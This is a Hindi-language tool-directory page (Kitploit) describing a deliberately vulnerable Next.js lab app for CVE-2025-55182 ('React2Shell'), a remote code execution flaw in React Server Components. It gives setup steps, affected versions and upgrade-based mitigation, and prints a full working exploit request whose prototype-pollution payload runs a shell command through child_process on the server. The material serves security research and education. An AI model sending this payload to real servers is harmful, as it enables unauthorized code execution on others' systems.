Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
NextJS-app-CVE-2025-55182 — CVE-2025-55182 (React2Shell) का प्रदर्शन करने वाला प्रूफ-ऑफ-कॉन्सेप्ट Next.js एप्लिकेशन, React सर्वर घटकों में एक महत्वपूर्ण RCE, शोषण उदाहरण और सुरक्षा अनुसंधान के लिए शमन मार्गदर्शन के साथ। | Kitploit
उपकरण/GitHubGitHub/s-mughal/nextjs-app-cve-2025-55182
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubs-mughal/nextjs-app-cve-2025-55182

NextJS-app-CVE-2025-55182

CVE-2025-55182 (React2Shell) का प्रदर्शन करने वाला प्रूफ-ऑफ-कॉन्सेप्ट Next.js एप्लिकेशन, React सर्वर घटकों में एक महत्वपूर्ण RCE, शोषण उदाहरण और सुरक्षा अनुसंधान के लिए शमन मार्गदर्शन के साथ।

रिपॉजिटरी देखें
19 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Next.js CVE-2025-55182 प्रूफ ऑफ कॉन्सेप्ट

यह एक प्रूफ-ऑफ-कॉन्सेप्ट Next.js एप्लिकेशन है जो CVE-2025-55182 (जिसे "React2Shell" के नाम से भी जाना जाता है) के लिए संवेदनशील है, जो React सर्वर कंपोनेंट्स में एक महत्वपूर्ण रिमोट कोड एक्सीक्यूशन (RCE) कमजोरी है।

⚠️ चेतावनी

यह एप्लिकेशन जानबूझकर संवेदनशील बनाया गया है और इसका उपयोग केवल इसके लिए किया जाना चाहिए:

  • सुरक्षा अनुसंधान
  • शैक्षिक उद्देश्य
  • पृथक वातावरण में परीक्षण

न करें:

  • उत्पादन में तैनात न करें
  • अविश्वसनीय नेटवर्क पर न खोलें
  • संवेदनशील डेटा के साथ उपयोग न करें

कमजोरी का विवरण

CVE-2025-55182 प्रभावित करता है:

  • React संस्करण 19.0.0 से 19.2.0 तक
  • Next.js संस्करण 15.x और 16.x (एप राउटर का उपयोग करते हुए)
  • React सर्वर कंपोनेंट्स (RSC) का उपयोग करने वाले एप्लिकेशन

यह कमजोरी React सर्वर कंपोनेंट्स पेलोड हैंडलिंग में असुरक्षित डिसीरियलाइजेशन से उत्पन्न होती है, जो अप्रमाणित हमलावरों को विशेष रूप से तैयार किए गए HTTP अनुरोधों के माध्यम से सर्वर पर मनमाना कोड निष्पादित करने की अनुमति देती है।

सेटअप निर्देश

विकल्प 1: स्थानीय विकास

  1. निर्भरताएँ स्थापित करें:

    npm install
    
  2. डेवलपमेंट सर्वर चलाएँ:

    npm run dev
    
  3. एप्लिकेशन तक पहुँचें: अपने ब्राउज़र में http://localhost:3000 खोलें।

विकल्प 2: डॉकर

  1. डॉकर इमेज बनाएँ:

    docker build -t nextjs-cve-2025-55182 .
    
  2. कंटेनर चलाएँ:

    docker run --rm -p 3000:3000 nextjs-cve-2025-55182
    
  3. एप्लिकेशन तक पहुँचें: अपने ब्राउज़र में http://localhost:3000 खोलें।

एप्लिकेशन संरचना

  • लॉगिन पेज (/): React सर्वर कंपोनेंट्स का उपयोग कर एक सरल लॉगिन फॉर्म
  • डैशबोर्ड (/dashboard): लॉगिन के बाद सुलभ एक संरक्षित पृष्ठ

संवेदनशील घटक

यह एप्लिकेशन उपयोग करता है:

  • Next.js 15.1.0 (संवेदनशील संस्करण)
  • React 19.0.0 (संवेदनशील संस्करण)
  • एप राउटर के साथ React सर्वर कंपोनेंट्स (RSC)
  • बेसिक create-next-app संरचना

यह कमजोरी RSC पेलोड डिसीरियलाइजेशन तंत्र में मौजूद है, जिसका शोषण पेज रूट्स (जैसे, http://localhost:3000 या http://localhost:3000/dashboard) पर सीधे दुर्भावनापूर्ण मल्टीपार्ट HTTP अनुरोध भेजकर किया जा सकता है। यह शोषण React सर्वर कंपोनेंट्स का उपयोग करने वाले किसी भी पृष्ठ पर काम करता है।

शोषण

इस कमजोरी का शोषण पेज रूट्स (जैसे, http://localhost:3000 या http://localhost:3000/dashboard) पर सीधे विशेष रूप से तैयार किए गए HTTP अनुरोध भेजकर किया जा सकता है। यह शोषण React सर्वर कंपोनेंट्स का उपयोग करने वाले किसी भी पृष्ठ पर काम करता है।

त्वरित शोषण उदाहरण

POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 740

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

यह शोषण सीधे पेज रूट्स को लक्षित करता है - localhost:3000 (होमपेज) या localhost:3000/dashboard (डैशबोर्ड पेज) पर काम करता है।

शमन

इस कमजोरी को ठीक करने के लिए:

  • React को संस्करण 19.0.1, 19.1.2, या 19.2.1+ में अपग्रेड करें
  • Next.js को पैच किए गए संस्करण (15.0.5+ या पैच के साथ 16.x) में अपग्रेड करें

संदर्भ

  • CVE-2025-55182
  • React सुरक्षा सलाहकार
  • Next.js सुरक्षा सलाहकार

लाइसेंस

यह प्रूफ-ऑफ-कॉन्सेप्ट केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है।

टूल डाउनलोड करें